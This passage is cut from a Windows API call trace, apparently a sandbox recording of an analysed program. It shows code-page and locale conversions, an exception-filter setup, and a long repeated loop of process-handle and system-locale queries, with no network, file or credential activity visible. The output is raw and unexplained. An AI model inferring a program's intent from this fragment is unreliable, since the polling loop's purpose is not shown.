out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⪜锨ᦴJĀ") returned 256 [0094.416] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⪜锨ᦴJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0094.416] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⪜锨ᦴJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0094.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢a\x1dK\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0094.416] GetLastError () returned 0x0 [0094.416] SetLastError (dwErrCode=0x0) [0094.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0094.417] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⪜锨ᦴJĀ") returned 256 [0094.417] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⪜锨ᦴJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0094.417] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⪜锨ᦴJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0094.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¢a\x1dK\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0094.417] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e50b) returned 0x0 [0094.417] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x252b70) returned 0x80 [0094.417] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0094.418] GetCurrentProcess () returned 0xffffffff [0094.418] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.418] GetSystemDefaultLangID () returned 0x2710409 [0094.418] GetThreadLocale () returned 0x409 [0094.418] GetCurrentProcess () returned 0xffffffff [0094.418] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.418] GetSystemDefaultLangID () returned 0x2710409 [0094.418] GetThreadLocale () returned 0x409 [0094.418] GetCurrentProcess () returned 0xffffffff [0094.418] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.418] GetSystemDefaultLangID () returned 0x2710409 [0094.418] GetThreadLocale () returned 0x409 [0094.419] GetCurrentProcess () returned 0xffffffff [0094.419] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.419] GetSystemDefaultLangID () returned 0x2710409 [0094.419] GetThreadLocale () returned 0x409 [0094.419] GetCurrentProcess () returned 0xffffffff [0094.419] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.419] GetSystemDefaultLangID () returned 0x2710409 [0094.419] GetThreadLocale () returned 0x409 [0094.419] GetCurrentProcess () returned 0xffffffff [0094.419] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.419] GetSystemDefaultLangID () returned 0x2710409 [0094.419] GetThreadLocale () returned 0x409 [0094.419] GetCurrentProcess () returned 0xffffffff [0094.419] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.419] GetSystemDefaultLangID () returned 0x2710409 [0094.419] GetThreadLocale () returned 0x409 [0094.419] GetCurrentProcess () returned 0xffffffff [0094.419] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.419] GetSystemDefaultLangID () returned 0x2710409 [0094.419] GetThreadLocale () returned 0x409 [0094.419] GetCurrentProcess () returned 0xffffffff [0094.419] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.419] GetSystemDefaultLangID () returned 0x2710409 [0094.419] GetThreadLocale () returned 0x409 [0094.419] GetCurrentProcess () returned 0xffffffff [0094.419] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.419] GetSystemDefaultLangID () returned 0x2710409 [0094.420] GetThreadLocale () returned 0x409 [0094.420] GetCurrentProcess () returned 0xffffffff [0094.420] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.420] GetSystemDefaultLangID () returned 0x2710409 [0094.420] GetThreadLocale () returned 0x409 [0094.420] GetCurrentProcess () returned 0xffffffff [0094.420] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.420] GetSystemDefaultLangID () returned 0x2710409 [0094.420] GetThreadLocale () returned 0x409 [0094.420] GetCurrentProcess () returned 0xffffffff [0094.420] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.420] GetSystemDefaultLangID () returned 0x2710409 [0094.420] GetThreadLocale () returned 0x409 [0094.420] GetCurrentProcess () returned 0xffffffff [0094.420] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.420] GetSystemDefaultLangID () returned 0x2710409 [0094.420] GetThreadLocale () returned 0x409 [0094.420] GetCurrentProcess () returned 0xffffffff [0094.420] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.420] GetSystemDefaultLangID () returned 0x2710409 [0094.420] GetThreadLocale () returned 0x409 [0094.420] GetCurrentProcess () returned 0xffffffff [0094.420] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.420] GetSystemDefaultLangID () returned 0x2710409 [0094.420] GetThreadLocale () returned 0x409 [0094.420] GetCurrentProcess () returned 0xffffffff [0094.420] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.420] GetSystemDefaultLangID () returned 0x2710409 [0094.421] GetThreadLocale () returned 0x409 [0094.421] GetCurrentProcess () returned 0xffffffff [0094.421] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.421] GetSystemDefaultLangID () returned 0x2710409 [0094.421] GetThreadLocale () returned 0x409 [0094.421] GetCurrentProcess () returned 0xffffffff [0094.421] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.421] GetSystemDefaultLangID () returned 0x2710409 [0094.421] GetThreadLocale () returned 0x409 [0094.421] GetCurrentProcess () returned 0xffffffff [0094.421] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.421] GetSystemDefaultLangID () returned 0x2710409 [0094.421] GetThreadLocale () returned 0x409 [0094.421] GetCurrentProcess () returned 0xffffffff [0094.421] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.421] GetSystemDefaultLangID () returned 0x2710409 [0094.421] GetThreadLocale () returned 0x409 [0094.421] GetCurrentProcess () returned 0xffffffff [0094.421] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.422] GetSystemDefaultLangID () returned 0x2710409 [0094.422] GetThreadLocale () returned 0x409 [0094.422] GetCurrentProcess () returned 0xffffffff [0094.422] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.422] GetSystemDefaultLangID () returned 0x2710409 [0094.422] GetThreadLocale () returned 0x409 [0094.422] GetCurrentProcess () returned 0xffffffff [0094.422] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.422] GetSystemDefaultLangID () returned 0x2710409 [0094.422] GetThreadLocale () returned 0x409 [0094.422] GetCurrentProcess () returned 0xffffffff [0094.422] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.422] GetSystemDefaultLangID () returned 0x2710409 [0094.422] GetThreadLocale () returned 0x409 [0094.422] GetCurrentProcess () returned 0xffffffff [0094.422] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.422] GetSystemDefaultLangID () returned 0x2710409 [0094.423] GetThreadLocale () returned 0x409 [0094.423] GetCurrentProcess () returned 0xffffffff [0094.423] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.423] GetSystemDefaultLangID () returned 0x2710409 [0094.423] GetThreadLocale () returned 0x409 [0094.423] GetCurrentProcess () returned 0xffffffff [0094.423] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.423] GetSystemDefaultLangID () returned 0x2710409 [0094.423] GetThreadLocale () returned 0x409 [0094.423] GetCurrentProcess () returned 0xffffffff [0094.423] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.423] GetSystemDefaultLangID () returned 0x2710409 [0094.423] GetThreadLocale () returned 0x409 [0094.423] GetCurrentProcess () returned 0xffffffff [0094.423] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.423] GetSystemDefaultLangID () returned 0x2710409 [0094.423] GetThreadLocale () returned 0x409 [0094.423] GetCurrentProcess () returned 0xffffffff [0094.424] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.424] GetSystemDefaultLangID () returned 0x2710409 [0094.424] GetThreadLocale () returned 0x409 [0094.424] GetCurrentProcess () returned 0xffffffff [0094.424] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.424] GetSystemDefaultLangID () returned 0x2710409 [0094.424] GetThreadLocale () returned 0x409 [0094.424] GetCurrentProcess () returned 0xffffffff [0094.424] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.424] GetSystemDefaultLangID () returned 0x2710409 [0094.424] GetThreadLocale () returned 0x409 [0094.424] GetCurrentProcess () returned 0xffffffff [0094.429] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.429] GetSystemDefaultLangID () returned 0x2710409 [0094.429] GetThreadLocale () returned 0x409 [0094.429] GetCurrentProcess () returned 0xffffffff [0094.429] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.429] GetSystemDefaultLangID () returned 0x2710409 [0094.429] GetThreadLocale () returned 0x409 [0094.429] GetCurrentProcess () returned 0xffffffff [0094.429] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.429] GetSystemDefaultLangID () returned 0x2710409 [0094.429] GetThreadLocale () returned 0x409 [0094.429] GetCurrentProcess () returned 0xffffffff [0094.429] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.429] GetSystemDefaultLangID () returned 0x2710409 [0094.429] GetThreadLocale () returned 0x409 [0094.429] GetCurrentProcess () returned 0xffffffff [0094.429] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.429] GetSystemDefaultLangID () returned 0x2710409 [0094.429] GetThreadLocale () returned 0x409 [0094.429] GetCurrentProcess () returned 0xffffffff [0094.429] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.429] GetSystemDefaultLangID () returned 0x2710409 [0094.429] GetThreadLocale () returned 0x409 [0094.429] GetCurrentProcess () returned 0xffffffff [0094.429] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.430] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.430] GetSystemDefaultLangID () returned 0x2710409 [0094.430] GetThreadLocale () returned 0x409 [0094.430] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 [0094.431] GetThreadLocale () returned 0x409 [0094.431] GetCurrentProcess () returned 0xffffffff [0094.431] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0094.431] GetSystemDefaultLangID () returned 0x2710409 